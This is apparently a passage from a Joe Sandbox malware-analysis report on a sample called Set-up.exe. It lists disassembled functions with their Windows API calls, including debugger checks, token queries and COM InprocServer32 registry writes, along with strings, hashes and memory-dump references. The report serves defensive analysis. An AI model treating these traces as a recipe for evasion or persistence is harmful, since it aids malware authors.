                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: !af_$!af_ && i<s_$Could not find a "versions" tag in the update information XML$Unknown$datavect<class Str8XmlPart *>::operator []$datavect<class Str8XmlPart *>::size$datavect<unsigned char>::size$ncvector<class Str8XmlPart>::operator []$version
                                                                                                                                  • API String ID: 2005118841-280143189
                                                                                                                                  • Opcode ID: e40926739d03c1c8cc8322b09b7e8f1b0b48394b9e9bc003aeb31635808c065a
                                                                                                                                  • Instruction ID: 4a670fecd29ccdb7889a985dba4c8f685ad8fa3d482986ed288e17504cc00619
                                                                                                                                  • Opcode Fuzzy Hash: e40926739d03c1c8cc8322b09b7e8f1b0b48394b9e9bc003aeb31635808c065a
                                                                                                                                  • Instruction Fuzzy Hash: A8C1AF70A11608DFDF25EF54C945BADBBF0FF10708F4090A9E9497B292DB71AA44CB62
                                                                                                                                  Function 00E5AC70 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 169COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,011A3C52(TokenIntegrityLevel),00000000,00000000,460C02D8,460C02D8,011A3C52,?,?), ref: 00E5ACB0
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5ACBE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5ACD4
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5AD41
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,?,?,00000000,00000000,00000002,460C02D8), ref: 00E5AD86
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E5AD94
                                                                                                                                  • GetLastError.KERNEL32(!af_,datavect<unsigned char>::size,000001E7,00000000,00000002,460C02D8), ref: 00E5ADF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$InformationToken$Exception@8Throw
                                                                                                                                  • String ID: !af_$GetTokenInformation(first)$GetTokenInformation(second)$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1581449499-1179448594
                                                                                                                                  • Opcode ID: 1f6fe43c8f1de5b36c495ea3fceeaa67608d51aff214b41572b8adcc2fca696b
                                                                                                                                  • Instruction ID: bd3309991aeb337899b796006fd6b8887ba0b52370e827b5cb6ac34c1cf15d33
                                                                                                                                  • Opcode Fuzzy Hash: 1f6fe43c8f1de5b36c495ea3fceeaa67608d51aff214b41572b8adcc2fca696b
                                                                                                                                  • Instruction Fuzzy Hash: 6C518271A00209ABDF14EBA1DD45FAFBBF8EF14709F540529F900F6180EB719948CBA2
                                                                                                                                  Function 00F7A580 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$NumCast$count >= 0$datavect<struct QuantumRegistry::Entry *>::begin$datavect<struct QuantumRegistry::Entry *>::operator []$ncvector<struct QuantumRegistry::Entry>::insert$ncvector_it<struct QuantumRegistry::Entry>::operator -$ptrs_ == x.ptrs_$value >= 0
                                                                                                                                  • API String ID: 0-2751344132
                                                                                                                                  • Opcode ID: a8a28cb1ba683dcdf6039232698e97dfa9f5884bd25e3012595b4f790bb257ab
                                                                                                                                  • Instruction ID: c7e750029c86ddd9efb351f0e3ab7047f1e8488078578453bef51b14806c755b
                                                                                                                                  • Opcode Fuzzy Hash: a8a28cb1ba683dcdf6039232698e97dfa9f5884bd25e3012595b4f790bb257ab
                                                                                                                                  • Instruction Fuzzy Hash: 1551C0B0A40359EFDF24DF54D841B9EBBF4EB94720F11816EE8146B381D7B5A900CBA2
                                                                                                                                  Function 00E6B88E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  • GetFileSize.KERNEL32(?,?), ref: 00E6B8D6
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B8E3
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B950
                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,?), ref: 00E6B990
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B99A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B9F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorException@8LastThrow$BreakConcurrency::cancel_current_taskDebugDebuggerModuleNamePresentSize
                                                                                                                                  • String ID: !af_$GetFileSize()$SetEndOfFile()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 2002377842-1736402520
                                                                                                                                  • Opcode ID: 241143ac3b4b43b0d697741d06496cc3ac7f04fc95ae32bb4bfc113a2e739ba3
                                                                                                                                  • Instruction ID: 898915c22fe2aeb960b12fa3f5b61f09dde57490ffbd4df7bf343511aab9ad01
                                                                                                                                  • Opcode Fuzzy Hash: 241143ac3b4b43b0d697741d06496cc3ac7f04fc95ae32bb4bfc113a2e739ba3
                                                                                                                                  • Instruction Fuzzy Hash: 3F41E2302002069FC718EF25E89596DBBE5FF88764F10062DF925D3394DB70B845CB96
                                                                                                                                  Function 00E46BE0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 117COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$NumCast$datavect<class basic_ncstring<wchar_t> *>::at$first < last$ncvector<class basic_ncstring<wchar_t> >::assign$ncvector_const_it<class basic_ncstring<wchar_t> >::operator *$ptrs_$value >= 0
                                                                                                                                  • API String ID: 0-2345452866
                                                                                                                                  • Opcode ID: 65f703b340e82469bf44b1b26bbd92073a90e3889c29f71f5353cbfc324cdf94
                                                                                                                                  • Instruction ID: ab405ad4ea0449cb14f55112bf8caf8b0a7abb3f5b3c977988a7ce417d909553
                                                                                                                                  • Opcode Fuzzy Hash: 65f703b340e82469bf44b1b26bbd92073a90e3889c29f71f5353cbfc324cdf94
                                                                                                                                  • Instruction Fuzzy Hash: F741D070B40245ABCB24EF14EC92F9A77E0EB52724F10951DF855BB2C0C7B0AD40CB56
                                                                                                                                  Function 00E45480 Relevance: 16.6, APIs: 11, Instructions: 130synchronizationthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E454B9
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E454C9
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E454E1
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45507
                                                                                                                                  • SetEvent.KERNEL32(?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8), ref: 00E45518
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45568
                                                                                                                                  • SetEvent.KERNEL32(?,0131DFD8,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8), ref: 00E45574
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExchangeInterlocked$Event$CurrentObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1261316448-0
                                                                                                                                  • Opcode ID: bb810bb6d8f8aa3a1fa167a08b98d04d8a0265e686daba0ed826a7471e460e9e
                                                                                                                                  • Instruction ID: ed4a62346149ce445c746d90869e7fd339c0a2b4885a3904c33c2d590c3be3e3
                                                                                                                                  • Opcode Fuzzy Hash: bb810bb6d8f8aa3a1fa167a08b98d04d8a0265e686daba0ed826a7471e460e9e
                                                                                                                                  • Instruction Fuzzy Hash: D9411076606685DFCB34CFA8F8457A87BB9FB04726F1046AEE821E3386D7395940CB10
                                                                                                                                  Function 00E45300 Relevance: 16.6, APIs: 11, Instructions: 111synchronizationthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AB84,00000000,00000000), ref: 00E4533B
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,000000FE,?,00E44C1B,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?), ref: 00E45357
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E4536F
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AB84,00000003), ref: 00E45395
                                                                                                                                  • SetEvent.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E453A9
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E453BE
                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,0131DFD8,000000FE), ref: 00E453E0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E45410
                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E4542E
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0131DFD8,000000FE), ref: 00E45435
                                                                                                                                  • SwitchToThread.KERNEL32(?,0131DFD8,000000FE,?,00E44C1B,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E4546A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExchangeInterlocked$CloseHandleObjectSingleWait$CallCompareEventFilterFunc@8MutexReleaseSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3389554242-0
                                                                                                                                  • Opcode ID: 1ccba530b206746614b02d73233ce6145932410196ad9aaa326aee55dc161dbc
                                                                                                                                  • Instruction ID: 783e669dd31795f2aa2d98b93cda25173f2cf6a64b04c099b8b2d4e1d3548032
                                                                                                                                  • Opcode Fuzzy Hash: 1ccba530b206746614b02d73233ce6145932410196ad9aaa326aee55dc161dbc
                                                                                                                                  • Instruction Fuzzy Hash: EB311433645A559BD7398FA9FC49B6D77B8FB00766F100239F422E3288D775A844CB50
                                                                                                                                  Function 0106FC00 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 255registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,0131A974,00000000,?,?,\InprocServer32,0000000F,00000000,000000FF,?,00000000,000000FF,?,?,?,460C02D8), ref: 0106FC8C
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0106FC9C
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(80000002,0131A974,00000000,011E3870,00000000,?,00000000,?,00000000), ref: 0106FD34
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,0131A974,00000000), ref: 0106FDE9
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,0131A974,00000000,?,?), ref: 0106FE61
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,RuntimeVersion,00000000,00000000,?,?), ref: 0106FF05
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenValue$CloseCreateQuery
                                                                                                                                  • String ID: 11223344556677889900$RuntimeVersion$\InprocServer32
                                                                                                                                  • API String ID: 3757241582-2218457465
                                                                                                                                  • Opcode ID: 7d8f5993660c2e5d9af6c1e8f64e6d4989c831e47ffa907ea4ded042f66328ca
                                                                                                                                  • Instruction ID: d8be8b73da02b250ee85d0dc7151ec4c404eb320be582a425b5584bfdf74ced8
                                                                                                                                  • Opcode Fuzzy Hash: 7d8f5993660c2e5d9af6c1e8f64e6d4989c831e47ffa907ea4ded042f66328ca
                                                                                                                                  • Instruction Fuzzy Hash: ACA1D170904209DFDB24DF64DD59BAEBBF8FF05304F1081A8E599A7281DB75AA48CF90
                                                                                                                                  Function 00E6E480 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 237registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?), ref: 00E6E52A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E586
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00E6DCBF,?,?,?), ref: 00E6E653
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
